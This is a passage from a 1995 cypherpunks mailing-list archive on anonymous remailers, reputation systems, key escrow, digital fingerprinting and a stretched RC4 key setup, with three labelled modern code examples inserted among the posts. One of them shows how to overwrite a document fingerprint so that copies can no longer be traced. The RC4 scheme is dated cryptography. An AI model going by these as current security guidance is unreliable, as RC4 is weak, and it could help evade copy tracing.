        jumping over each other attacking you, not defending him.

A|bruce schneier is copyrighting crypt programs and
 |threatining to sue people who use it.

        So?  His programs, his rules.  If you used one of my programs
        without a license, I'd sue you, too.

A|even phil zimmerman is selling the rights to pgp. what about all the people w
 | contributed code (like me). not a dime for us because phil is famous
 |and your not alowed to say anythingn bad about him. sorry i forgot phil is go
 |no one dares to complain. ask phil about me and when i asked about sharing
 |profits from the code i conrtibuted. also about the deal with
 |r.f...

        You weren't expecting money when you contributed code.  What
        changed?

A|lets get back to being punks. fuck these traitors. do crypto and fuck the nsa

        Random defiance won't get you anywhere you want to be.


   :----------:----------:----------:----------:----------:----------:-----
   : furi@the-matrix.com |   pgp-public-key@demon.co.uk   | LIVE LION ALERT
   : 2.6.2 1024/C1225CE1 | 38 11 7C 59 FB F3 7C C0  F7 E9 67 1F AF B8 2D 94
                 PGP: When it's none of their damned business.
---
  SPEED 2.00 #2640  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David C. Lambert" <dcl@panix.com>
Date: Sun, 10 Sep 95 12:08:56 PDT
To: cypherpunks@toad.com
Subject: Precipice remailer open for business
Message-ID: <199509101908.PAA26842@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



The Precipice Remailer is now open for business!

Below, I have included the remailer-help file.

You can get this file by sending a message to:

  mixmaster@mix.precipice.com

with a subject of "remailer-help".

- David C. Lambert
  dcl@panix.com
  dcl@mix.precipice.com

================================================================================

This remailer supports both type II (Mixmaster) and type I (Ghio)
cypherpunks messages.  Help files for both are below.

Both mailers have a 5 message reordering pool, with zero default latency.
Posting to Usenet is not supported.

I consider the following to be inappropriate use of this anonymous remailer,
and will take steps to prevent anyone from doing any of the following:

   - Sending messages intended primarily to be harassing or annoying
     (this includes spam/velveeta);
   - Use of the remailer for any illegal purpose
     (death threats, kiddie porn, etc).

Don't ruin this remailer for everyone by doing something stupid
and/or illegal, and I won't be forced to assist the authorities in
crushing you like an insect.

If you don't want to receive anonymous mail, send me a message, and I will
add your email address to the block list.

You can get a list of statistics on remailer usage by sending mail to
mixmaster@mix.precipice.com with Subject: remailer-stats

Have a nice day.

- David C. Lambert
  dcl@mix.precipice.com


The type I PGP key is:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAypWYAAAEEAMUFk7ue4Isn2u1FMtYhJBLbSmxSgUaBgs8EJNZZYExcfTCr
V+m8o2N3pYxzbjPRAZ/pv0N1Tg93Kh17/RSzEjR/y91aaBjePv36VYKwCS8KeeX+
4LDyboic5EVkiDt1eu2cI6LIrl9w7Fo1/3YzNvsMVJ1ki/v5Ie5wAysW17oJAAUR
tBttaXhtYXN0ZXJAbWl4LnByZWNpcGljZS5jb20=
=hVLK
-----END PGP PUBLIC KEY BLOCK-----

The Mixmaster key is:

precipice mixmaster@mix.precipice.com 05fef5887ac55dfe7379d0ef4a2a0c4b 2.0.1



==============================
TYPE II INFO (Mixmaster 2.0.1)
==============================
This is a Mixmaster remailer. It provides an extremely high level of security.
To use it, you must have a client program to produce the messages.
This software is available from ftp://nately.ucsd.edu/pub/remail
Read the README file for instructions. This file is export restricted,
so it can not be retrieved directly.

Some information can be sent to you by the remailer by including the
following commands (one per message) in the subject line of mail to the
remailer.

  remailer-help		This file.

  remailer-stats	Usage statistics for the last 24 hours.

  remailer-key		The mixmaster key file for this remailer.


A list of remailers is available from ftp://nately.ucsd.edu/pub/remail,
http://nately.ucsd.edu/~loki/, and will be posted periodically to
alt.privacy.anon-server and other privacy related groups.


======================
TYPE 1 INFO (Ghio 2.0)
======================

I have an automated mail handling program installed here which will take
any message with the proper headers and automatically re-send it anonymously.
You can use this by sending a message to mixmaster@mix.precipice.com, with the
header Anon-To: containing the address that you want to send anonymously to.
(Only one recipient address is permitted.)  If you can't add headers to your
mail, you can place two colons on the first line of your message, followed
by the Anon-To line.  Follow that with a blank line, and then begin your
message.  For Example:

> From: joe@site.com
> To: mixmaster@mix.precipice.com
> Subject: Anonymous Mail
>
> ::
> Anon-To: beth@univ.edu
>
> This is some anonymous mail.

The above would be delivered to beth@univ.edu anonymously.  All headers in
the original message are removed, with the exception of the Subject (and
Content-Type, if present).  She would not know that it came from Joe, nor
would she be able to reply to the message.

However, if Beth suspected that Joe had sent the message, she could compare
the time that the message was received with the times that Joe was logged
in.  However, this problem can be avoided by instructing the remailer to
delay the message, by using the Latent-Time header:

> From: joe@site.com
> To: mixmaster@mix.precipice.com
> Subject: Anonymous Mail
>
> ::
> Anon-To: beth@univ.edu
> Latent-Time: +1:00
>
> This is some anonymous mail.

The above message would be delayed one hour from when it is sent.  It is also
possible to create a random delay by adding an r to the time (i.e. +1:00r),
which would have the message be delivered at a random time, but not more
than an hour.

Another problem is that some mailers automatically insert a signature file.
Of course, this usually contains the sender's email address, and so would
reveal their identity.  The remailer software can be instructed to remove
a signature file with the header "Cutmarks".  Any line beginning with the
same text as in the cutmarks header, and any lines following it will be
removed.

> From: sender@origin.com
> To: mixmaster@mix.precipice.com
> Subject: Anonymous Mail
>
> ::
> Anon-To: recipient@destination.com
> Cutmarks: --
>
> This line of text will be in the anonymous message.
> --
> This line of text will not be in the anonymous message.

You can add additional headers to the output message by preceding them
with ##

> From: chris@nifty.org
> To: mixmaster@mix.precipice.com
> Subject: Nifty Anon Msg
>
> ::
> Anon-To: andrew@hell.edu
>
> ##
> Reply-To: acs-314159@chop.ucsd.edu
>
> A Message with a reply address.

By separating messages with cutmarks, you can send more than one message
at once:

> From: me@mysite
> To: mixmaster@mix.precipice.com
> Subject: message 1
>
> ::
> Anon-To: recipient1@site1.org
> Cutmarks: --
> 
> Message one.
> --
> ::
> Anon-To: recipient2@site2.org
> 
> ##
> Subject: message 2
> 
> Message two.

The two messages will be delivered separately.

For added security, you can encrypt your messages to the remailer with PGP.
The remailer software will decrypt the message and send it on.  Here is the
remailer's public key:


To utilize this feature, create a message with two colons on the first line,
then the Anon-To line, then any other headers, such as cutmarks or latency,
then a blank line, and then the message.  Encrypt this with the remailer's
public key.  Then send it to the remailer, adding the header "Encrypted: PGP".
If you forget this, the remailer won't know that it needs to be decrypted.
Also be sure to use the -t option with PGP, or the linefeeds might not be
handled properly.

> To: mixmaster@mix.precipice.com
> From: me@mysite.org
>
> ::
> Encrypted: PGP
>
> -----BEGIN PGP MESSAGE-----
> Version: 2.6.2
>
> hIkCuMeAjnwmCTUBA+dfWcFk/fLRpm4ZM7A23iONxkOGDL6D0FyRi/r0P8+pH2gf
> HAi4+1BHUhXDCW2LfLfay5JwHBNMtcdbgXiQVXIm0cHM0zgf9hBroIM9W+B2Z07i
> 6UN3BDhiTSJBCTZUGQ7DrkltbgoyRhNTgrzQRR8FSQQXSo/cf4po0vCezKYAAABP
> smG6rgPhdtWlynKSZR6Gd2W3S/5pa+Qd+OD2nN1TWepINgjXVHrCt0kLOY6nVFNQ
> U7lPLDihXw/+PPJclxwvUeCSygmP+peB1lPrhSiAVA==
> =da+F
> -----END PGP MESSAGE-----

Any unencrypted text after the PGP message is also remailed.  This is to
allow sending to someone who is anonymous.  If you create a PGP-encrypted
message to yourself via my remailer, and then you give it to someone, they
can send you a message by sending the encrypted message to the remailer.
The remailer will then decrypt it and send it to you.  The message gets
anonymized in the process, so the sender will need to include a return
address if he wants a reply.

Messages sent this way can be encrypted using the Encrypt-Key: feature.
Any text following a line beginning with ** will be encrypted with this
key.  For example, if you put in your PGP message:

> ::
> Anon-To: you@yourhost.org
> Encrypt-Key: your_password
> 
> **

The appended message after the ** will be encrypted with the key 
"your_password", using PGP's conventional encryption option.  

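Added example (not part of the original post or of the remailer software): a Python parser for the Type I processing rules the help file above describes, covering the `::` control block, Anon-To, Latent-Time, Cutmarks and `##` headers, plus a check for the signature leak that Cutmarks is meant to prevent. The function names, the sample mail and the rule that a `##` header replaces a kept header of the same name are assumptions.

```python
import re
from dataclasses import dataclass, field

KEPT_ORIGINAL = ("subject", "content-type")  # all other incoming headers are dropped

@dataclass
class Outgoing:
    anon_to: str
    headers: dict = field(default_factory=dict)
    body: str = ""
    delay_minutes: int = 0
    random_delay: bool = False

def read_headers(lines, i):
    """Collect 'Name: value' lines from index i up to the next blank line."""
    pairs = []
    while i < len(lines) and lines[i].strip():
        name, sep, value = lines[i].partition(":")
        if not sep:
            raise ValueError(f"malformed header line: {lines[i]!r}")
        pairs.append((name.strip(), value.strip()))
        i += 1
    return pairs, i + 1  # i + 1 skips the blank separator

def parse_latency(value):
    """'+1:00' -> (60, False); '+1:00r' -> (60, True): random, at most 60 minutes."""
    m = re.fullmatch(r"\+(\d+):(\d\d)(r?)", value)
    if not m:
        raise ValueError(f"bad Latent-Time value: {value!r}")
    return int(m.group(1)) * 60 + int(m.group(2)), m.group(3) == "r"

def process(original_headers, body):
    """Return the Outgoing messages one piece of incoming mail turns into."""
    kept = {k: v for k, v in original_headers.items() if k.lower() in KEPT_ORIGINAL}
    lines, results = body.splitlines(), []
    while True:
        while lines and not lines[0].strip():
            lines.pop(0)
        if not lines or lines[0].strip() != "::":
            break  # anything after a cutmark that is not a new '::' block is dropped
        pairs, i = read_headers(lines, 1)
        control = {name.lower(): value for name, value in pairs}
        anon_to = control.get("anon-to", "")
        if not anon_to or re.search(r"[\s,]", anon_to):
            raise ValueError("exactly one Anon-To address is required")
        segment, lines = lines[i:], []
        cut = control.get("cutmarks")
        for k, line in enumerate(segment if cut else []):
            if line.startswith(cut):  # this line and the rest leave the message
                segment, lines = segment[:k], segment[k + 1:]
                break
        headers = dict(kept)
        if segment and segment[0].strip() == "##":
            extra, j = read_headers(segment, 1)
            for name, value in extra:  # assumption: '##' replaces a kept header
                headers = {h: v for h, v in headers.items() if h.lower() != name.lower()}
                headers[name] = value
            segment = segment[j:]
        delay, rand = parse_latency(control.get("latent-time", "+0:00"))
        results.append(Outgoing(anon_to, headers, "\n".join(segment).strip(), delay, rand))
    if not results:
        raise ValueError("no '::' control block found")
    return results

def leaks_sender(sender, msg):
    """True if the sender's address survives in what the recipient will see."""
    visible = msg.body + "\n" + "\n".join(msg.headers.values())
    return sender.lower() in visible.lower()

# Constructed samples: the help file's two-message example, and a mail whose
# mailer appended a signature, with and without a Cutmarks header.
MULTI = """::
Anon-To: recipient1@site1.org
Cutmarks: --

Message one.
--
::
Anon-To: recipient2@site2.org

##
Subject: message 2

Message two.
"""
SIGNED = "::\nAnon-To: beth@univ.edu\n{}Latent-Time: +1:00r\n\nHello.\n-- \nJoe <joe@site.com>\n"

if __name__ == "__main__":
    for m in process({"From": "me@mysite", "Subject": "message 1"}, MULTI):
        print(m)
    for cut in ("", "Cutmarks: --\n"):
        m = process({"From": "joe@site.com", "Subject": "hi"}, SIGNED.format(cut))[0]
        print(repr(cut), "leaks sender:", leaks_sender("joe@site.com", m))
```

Without the Cutmarks header the appended signature reaches the recipient with the sender's address in it; with it, only "Hello." is forwarded.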



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Sun, 10 Sep 95 12:23:05 PDT
To: cypherpunks@toad.com
Subject: Re: not a flame please read and think about this
In-Reply-To: <199509100245.EAA09943@utopia.hacktic.nl>
Message-ID: <9509101521.ZM13875@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain


Hm. Time for agents. But here's a fairly simple test:
if there are no uppercase letters in the body of the message, and no
apostrophes either, it's likely from "anonymous", our favorite Thomas.

After all, the other reputable nyms at least *sign* their stuff, don't
they? [and PGP generally seems to use upper-case when it writes
signatures]

frodo =)
--
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sun, 10 Sep 95 15:32:12 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: question about reputation
Message-ID: <Pine.SUN.3.91.950910145610.8377A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


In an economy based on positive reputations, how does one acquire a 
reputation capital?  One way may be to initially perform services at a 
price below cost, but this has some problems.

For example, Alice starts an anonymous consulting service, and announces 
that she will answer the first ten queries for free.  Upon hearing this, 
Mallet immediately starts another consulting service, and announces the 
same offer.  At this point Mallet can simply forward his customers' 
queries to Alice and Alice's answers back to his customers.  Thus, he gains 
reputation at no cost.

On the other hand, this "man-in-the-middle" attack can also work against
conventional True Name based services, but perhaps with less effect.  Has
anyone ever heard of this being done? 

Is there a better way to acquire a good reputation?

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sun, 10 Sep 95 17:20:39 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: question about reputation
In-Reply-To: <199509102310.TAA00342@bwh.harvard.edu>
Message-ID: <Pine.SUN.3.91.950910164221.8377C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Sep 1995, Adam Shostack wrote:

> 	Good question, but a quick modification allows for effective
> bootstrapping.  If I want to start consulting for Amalgameted
> Consolodated, I can offer them a 10 free questions deal to bootstrap
> things with.  Mallet can only cheat if my offer was broadcast.  (I 
> presume that Amalagated' keys are somehow strongly verified, and the
> negotiantions are kept secret from Eve and Mallet.)

This scheme doesn't quite work.  (Let's call Amalgameted Bob, to keep
names short.)  Bob can create a new, unlinkable pseudonym and give the same
offer to Carol under the new pseudonym.  Then, Bob acts as Mallet and
passes messages back and forth between Alice and Carol.  At the end of the
10 free questions, Bob terminates its contract with Alice, leaving Alice
with nothing and Bob's pseudonym a certain amount of reputation with
Carol. 

> 	There might also be fingerprinting technologies that allow me
> to embed a signature in the documents returned to clients that would
> allow me to show that Mallet stole them.  (Which might, incidentally,
> get Mallet a job in some circles...If thats known, Bob and Alice can
> collude to make it appear that Bob was Mallet, and thus forge a
> reputation.

Fingerprinting may be useful in some situations, but is clearly not a
perfect solution to this problem.  Alice may be able to prove to Mallet's
customers that she originally wrote the answers, but if their
communications with Mallet are private, how does Alice even know who those
customers are?  Also, I'm not too familiar with fingerprinting
technologies, but Mallet may be able to remove the identifying marks by
translating the answers to a different form while preserving the meaning.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Trost <trost@cloud.rain.com>
Date: Sun, 10 Sep 95 18:14:07 PDT
To: cypherpunks@toad.com
Subject: NIS&T Key Escrow Export kangaroo conference
Message-ID: <m0srxRp-00004yC@cloud.rain.com>
MIME-Version: 1.0
Content-Type: text/plain


Pat Farrell's summary of the NIS&T conference (thanks for the report,
by the way!) discussed a bunch of "criteria" that an "acceptable" GAK
system should provide, including a couple that are supposed to limit
the ability of law enforcement to use keys beyond the bounds of the
search warrant.

Another criterion that needs to be brought up (although I'm not sure
of how one would phrase it in a way that is either clean or polite) comes
out of a debate between Philip Zimmermann and Dorothy Denning I ran
across at one point: "How can a GAK system be arranged so that some
future Congress cannot destroy the protections of the split-"escrow"
system by issuing a resolution like 'All key components of suspected
Comm^H^H^H^H terrorists shall be provided to the House Committee on
Unamerican Activities'?"

The links to McCarthyism are important here.  GAK proponents can't
claim this kind of thing won't happen -- it *has* happened, and could
easily happen again.  Anyone who claims otherwise is either terribly
naive or is being outright misleading.

In some sense, this criterion goes to the very heart of the whole GAK
question -- even if you believe in the allegedly legitimate power of
law enforcement to look through people's love letters, the "safety
mechanisms" for the keys are nothing more than a set of flimsy
policies that Congress could toss aside the next time something scary
comes along.  The protections that the GAK proponents are proposing
(and proponing (-: ) are frightfully ephemeral.

By the way, I'm a few days behind, so sorry if this is "old mail".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Sun, 10 Sep 95 16:47:01 PDT
To: cypherpunks@toad.com
Subject: Senate Bill 974?
Message-ID: <Pine.BSI.3.91.950910183148.5633A-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain


	
Haven't seen it discussed here, but the August 28, 1995 issue of Lan
Times covers Sen. Charles Grassley's (R-IOWA) Senate Bill 974.
Frankly, you should probably read the text of the bill itself,
because the article doesn't seem to get the facts straight.

The article asserts first that the bill may outlaw any non-GAK
encryption, but then quotes the senator as saying ``All my
bill does is say you can't use computers to steal, to threaten
others or conceal criminal conduct.''  Perhaps concealing
criminal conduct is considered using non-GAK.  The quote from
the bill itself reads like the ITAR; it is illegal to ``distribute
computer software that encodes or encrypts electronic or digital
communications to computer networks that the person knows, or 
reasonably should know, is accessible to foreign nationals and
foreign governments, regardless of whether such software has been
designated as nonexportable."


The article also says that up to 64 bit keys may now be allowed
in exportable software, but that ``some experts'' suggest
that those keys may have to be GAK.  I've never heard anything
BUT the keys would have to be GAK.


David Neal <dneal@usis.com> - GNU Planet Aerospace 1-800-PLN-8-GNU
Unix, Sybase and Networking consultant. "...you have a personal responsibility 
to be pro-active in the defense of your own civil liberties." - S. McCandlish





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sun, 10 Sep 95 18:57:48 PDT
To: cypherpunks@toad.com
Subject: Digital Fingerprinting
Message-ID: <v02120d07ac79452480e1@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



A couple of threads have recently touched on aspects
of "digital fingerprinting", a term that covers a variety
of methods for making changes to digital documents in
order to trace the origin of illicit copies. This subject
has been on my mind after several discussions on this topic
at Crypto, as well as the one formal presentation on the
subject.

Here are some of my thoughts on this subject:

  o If the domain of changes is well understood, and can be
    altered without significant loss of quality, then it is
    trivially easy to remove the fingerprinting. In other words,
    if you know the algorithm used to create the fundamental
    codewords in the fingerprint, and you can overwrite
    arbitrary codeword bits with other codeword bits, then the scheme
    can be avoided without collaboration of any kind.

    Example: A software company fingerprints its software by
    mapping two equivalent machine instructions onto binary "0"
    and "1", respectively. Someone who knows about this could
    randomly replace one instruction with the equivalent one,
    which would reduce the fingerprint to noise.

    Example: A publishing company uses an even number of points
    between paragraphs to indicate "0" and an odd number of
    points to indicate "1". Someone who understands this can
    overwrite the fingerprint as above.

  o If a fingerprinting scheme depends on the secrecy of an algorithm,
    then this is really "security by obscurity", which may
    be effective for a period of time, but is likely to meet
    the fate of most copy protection schemes that have rested
    on raw obscurity.

  o Certain domains of information lend themselves to the
    secure formation of fingerprint "bits" that are very difficult
    to scrub in this way. One such scheme was used as the basis
    for the presentation at Crypto: imagine that a film was shot
    with two (or N) cameras. For each frame of the film, the
    distributor can choose to take a frame from a different
    camera. Frames from camera 0 would be mapped onto binary "0",
    frames from camera 1 would be mapped onto binary "1". Using
    this approach it is possible to construct schemes that are
    resistant to collaboration up to "N" people.

    The security of such schemes rests on the assumption
    that given one frame, it is very hard (and possibly intractable)
    to fuzz up the frame such that the parallax information doesn't
    give away which camera shot the frame. Rather than hiding the
    fingerprint information in the "low bits", this technique hides
    the information throughout the picture.

    In one sense, a 2D picture of a 3D object is similar to a one-
    way hash function. It is a form of lossy compression on the 3D
    object that is impractical to work backwards.

  o Note that overwriting a fingerprint with random noise (or
    whatever) does not generate a valid replacement fingerprint.
    Therefore it would still be possible to tell that a document
    had been tampered with (and was not a valid copy), even if
    its provenance could not be determined.

  o A number of people are working on "black box" viewer technology,
    which would allow people to purchase documents that could only
    be read on devices with tamper-resistant hardware in them that
    would be required to decrypt media. Certainly much piracy could
    be done by capturing the output of such a box (unless it was
    embedded in a tamper-resistant chassis); there are some proposed
    schemes for reducing the payoff of output capture, but they
    depend on a similar approach to the movie fingerprinting idea
    above -- the base data format is somehow richer, possibly capable
    of generating different output under different circumstances or
    on different hardware platforms, while the output of the black
    box represents only one view of the base data.

    Example: a base format for a 3D object is encrypted with a
    public key resident in the "black box". Said black box also
    includes a hardware 3D rendering engine. The output of the
    black box consists of a series of 2D frames, which may make
    it impractical to reproduce the base 3D object.

    It is my considered opinion that this sort of technology will
    meet with tremendous customer resistance, and will not prove
    practical or cost-effective; many analysts are predicting a
    trend toward more general purpose computers for media viewing
    rather than towards specialized hardware that is needed for
    this kind of approach.

  o There are also some profound practical and legal problems with
    the use of digital fingerprinting. For one thing, it involves
    generating a unique copy of every document for each consumer.
    After the digital fingerprinting session at Crypto, a guy from
    Microsoft was pointing out the incredible difficulties posed
    by trying to fingerprint, say, every copy of Windows 95.

    On the legal front, it's not clear what you can do to someone
    even if you _can_ prove that the 100,000 pirate copies of Windows
    95 circulating in Amsterdam stemmed from his copy. Machines get
    hacked, co-workers and family members often have free access to
    machines running software -- it's not clear that media companies
    _want_ to invoke the paranoia associated with potential responsibility
    for millions of dollars in damages if someone makes an illegal copy
    of one's software and the loaves and fishes ensue. [Imagine what
    great revenge this would make for jealous co-workers, ex-wives, etc.]
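
Added example (not from the original message): the paragraph-spacing fingerprint from the post in Python, with the "valid fingerprint" check from the later bullet made concrete so that an overwritten copy is flagged as altered even though it can no longer be traced. The codeword layout (16-bit customer id plus a 16-bit truncated HMAC tag), the key, the function names and the sample document are assumptions.

```python
import hashlib
import hmac
import random

ID_BITS, TAG_BITS = 16, 16
PUBLISHER_KEY = b"constructed-demo-key"  # assumption: a secret only the publisher holds
BASE_GAPS = [12] * 40  # constructed document: 40 paragraph gaps of 12 points

def codeword(customer_id):
    """Bits of the customer id followed by a truncated HMAC tag over that id."""
    if not 0 <= customer_id < 2 ** ID_BITS:
        raise ValueError("customer id out of range")
    id_bytes = customer_id.to_bytes(ID_BITS // 8, "big")
    mac = hmac.new(PUBLISHER_KEY, id_bytes, hashlib.sha256).digest()
    value = (customer_id << TAG_BITS) | int.from_bytes(mac[:TAG_BITS // 8], "big")
    return [(value >> shift) & 1 for shift in range(ID_BITS + TAG_BITS - 1, -1, -1)]

def embed(gaps, customer_id):
    """Set the parity of each paragraph gap (in points): even = 0, odd = 1."""
    bits = codeword(customer_id)
    if len(gaps) < len(bits):
        raise ValueError("document has too few paragraph gaps")
    return [g + (g % 2 != b) for g, b in zip(gaps, bits)] + list(gaps[len(bits):])

def extract(gaps):
    """Read the fingerprint bits back from the gap parities."""
    return [g % 2 for g in gaps[:ID_BITS + TAG_BITS]]

def trace(gaps):
    """Customer id if the copy carries a valid codeword, else None (altered copy)."""
    bits = extract(gaps)
    if len(bits) < ID_BITS + TAG_BITS:
        return None
    customer_id = int("".join(map(str, bits[:ID_BITS])), 2)
    return customer_id if bits == codeword(customer_id) else None

def overwrite(gaps, rng):
    """The overwriting case from the post: every gap gets a random parity."""
    return [g + rng.randrange(2) for g in gaps]

def agreement(a, b):
    """Fraction of fingerprint bits on which two copies agree."""
    pairs = list(zip(extract(a), extract(b)))
    return sum(x == y for x, y in pairs) / len(pairs)

if __name__ == "__main__":
    issued = embed(BASE_GAPS, 0x2A5C)
    print("issued copy traces to:", hex(trace(issued)))
    scrubbed = overwrite(issued, random.Random(1995))
    print("overwritten copy traces to:", trace(scrubbed))
    print("bit agreement with issued copy:", agreement(issued, scrubbed))
```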






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Sun, 10 Sep 95 15:57:18 PDT
To: Wei Dai <weidai@eskimo.com>
Subject: Re: question about reputation
In-Reply-To: <Pine.SUN.3.91.950910145610.8377A-100000@eskimo.com>
Message-ID: <9509102257.AA28992@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Wei wrote:

|> In an economy based on positive reputations, how does one acquire a 
|> reputation capital?  One way may be to initially perform services at a 
|> price below cost, but this has some problems.

|> For example, Alice starts a anonymous consulting service, and announces 
|> that she will answer the first ten queries for free.  Upon hearing this, 
|> Mallet immediately starts another consulting service, and announces the 
|> same offer.  At this point Mallet can simply forward his customers' 
|> queries to Alice and Alice's answers back to his customers.  Thus, he gains 
|> reputation at no cost.

A) There is a real cost (some combination of reputation and other capital)
   involved in attracting customers.

B) This is emphatically _not_ an "abuse" of reputation capital. Mallet will
   acquire a reputation based on the quality of the service he provides.
   Suppose that Bob also set up a service like Alice. Some people would
   go directly to Alice, some to Bob, and some to Mallet who chooses
   whichever of Alice and Bob offers the best deal for the customer.
   By choosing intelligently, Mallet could acquire a better reputation
   than either Alice or Bob. This would not be inaccurate. By using Mallet,
   (now a consulting services broker) the customers are getting a better deal.
   (i.e. MAX(A(x),B(x)) is greater than or equal to both A(x) and B(x)).

JWS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Sun, 10 Sep 95 19:02:06 PDT
To: cypherpunks@toad.com
Subject: Re: 64 bit crypto
Message-ID: <199509110157.SAA01073@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



John A. Limpert says:
> Why would the attacker need to run the key setup 65536 times?

I could have been more clear.

Forgive a little bit of code...

Here is the beginning of the alleged RC4:
        /* start from the identity permutation */
        for(counter = 0; counter < 256; counter++)
                state[counter] = counter;
        index2 = 0;
        key->x = key->y = index1 = index2 = 0;
        /* one pass of key mixing over the state array */
        for(counter = 0; counter < 256; counter++)
        {
                index2 = (key_data_ptr[index1] + state[counter] + index2) % 256;
                swap_byte(&state[counter], &state[index2]);

                index1 = (index1 + 1) % key_data_len;
        }

If it was changed to

        for(counter = 0; counter < 256; counter++)
                state[counter] = counter;
        key->x = key->y = index1 = index2 = 0;
        for(i = 0; i < 65536; i++) {    /* stir the pot a long time */
                for(counter = 0; counter < 256; counter++)
                {
                        index2 = (key_data_ptr[index1] + state[counter] + index2) % 256;
                        swap_byte(&state[counter], &state[index2]);

                        index1 = (index1 + 1) % key_data_len;
                }
        }

Then the prepare_key routine would take much much longer.

The idea is that a 64 bit crypto routine can be arbitrarily
secure against brute-forcing, if you are willing to pay a
runtime penalty every time you use it.

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-8624
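
The repeated key setup from the message above, as an added, self-contained example (not code from the original post). The names prepare_key_stretched, rounds and the helper functions are assumptions made here; the key in keystreams_differ is constructed. With a 64-bit key and 65536 passes, a search costs about 2^64 x 2^16 = 2^80 single-pass setups.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    uint8_t state[256];
    uint8_t x, y;
} rc4_key;

static void swap_byte(uint8_t *a, uint8_t *b) { uint8_t t = *a; *a = *b; *b = t; }

/* Key setup with the mixing pass repeated `rounds` times; rounds == 1 is
 * ordinary RC4. index1/index2 carry over between passes, as in the post.
 * Returns the number of swaps performed, i.e. the cost of one key trial. */
unsigned long prepare_key_stretched(const uint8_t *key_data, size_t key_len,
                                    unsigned long rounds, rc4_key *key)
{
    unsigned long swaps = 0;
    size_t index1 = 0;
    uint8_t index2 = 0;

    for (int c = 0; c < 256; c++)
        key->state[c] = (uint8_t)c;
    key->x = key->y = 0;
    if (key_len == 0)
        return 0;                       /* no key material: nothing to mix in */

    for (unsigned long r = 0; r < rounds; r++) {
        for (int c = 0; c < 256; c++) {
            index2 = (uint8_t)(key_data[index1] + key->state[c] + index2);
            swap_byte(&key->state[c], &key->state[index2]);
            index1 = (index1 + 1) % key_len;
            swaps++;
        }
    }
    return swaps;
}

/* Standard RC4 output generation: XOR the keystream into buf in place. */
void rc4(rc4_key *key, uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        key->x = (uint8_t)(key->x + 1);
        key->y = (uint8_t)(key->y + key->state[key->x]);
        swap_byte(&key->state[key->x], &key->state[key->y]);
        buf[i] ^= key->state[(uint8_t)(key->state[key->x] + key->state[key->y])];
    }
}

/* One pass must reproduce the widely published RC4 vector:
 * key "Key", plaintext "Plaintext" -> BB F3 16 E8 D9 40 AF 0A D3. */
int matches_known_vector(void)
{
    static const uint8_t expect[9] =
        {0xBB, 0xF3, 0x16, 0xE8, 0xD9, 0x40, 0xAF, 0x0A, 0xD3};
    uint8_t buf[9];
    rc4_key k;

    memcpy(buf, "Plaintext", sizeof buf);
    prepare_key_stretched((const uint8_t *)"Key", 3, 1, &k);
    rc4(&k, buf, sizeof buf);
    return memcmp(buf, expect, sizeof buf) == 0;
}

/* The keystream is derived from the final state, so whoever tests a
 * candidate key has to run every pass. Returns 1 if the first 16
 * keystream bytes differ between the two pass counts. */
int keystreams_differ(unsigned long rounds_a, unsigned long rounds_b)
{
    static const uint8_t key[8] = {1, 2, 3, 4, 5, 6, 7, 8}; /* constructed 64-bit key */
    uint8_t a[16] = {0}, b[16] = {0};
    rc4_key k;

    prepare_key_stretched(key, sizeof key, rounds_a, &k);
    rc4(&k, a, sizeof a);
    prepare_key_stretched(key, sizeof key, rounds_b, &k);
    rc4(&k, b, sizeof b);
    return memcmp(a, b, sizeof a) != 0;
}

/* Swaps needed to set up one key at the given pass count. */
unsigned long setup_cost(unsigned long rounds)
{
    rc4_key k;
    return prepare_key_stretched((const uint8_t *)"Key", 3, rounds, &k);
}

int main(void)
{
    printf("one pass matches published vector: %s\n",
           matches_known_vector() ? "yes" : "no");
    printf("swaps per key trial, 1 pass:       %lu\n", setup_cost(1));
    printf("swaps per key trial, 65536 passes: %lu\n", setup_cost(65536UL));
    printf("keystream depends on pass count:   %s\n",
           keystreams_differ(1, 65536UL) ? "yes" : "no");
    return 0;
}
```
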




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sun, 10 Sep 95 16:04:04 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: not a flame please read and think about this
Message-ID: <9509102303.AA13613@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>I was kind of wondering if it would be necessary to patent something
>just to ensure someone else did patent *your* idea, if you came up
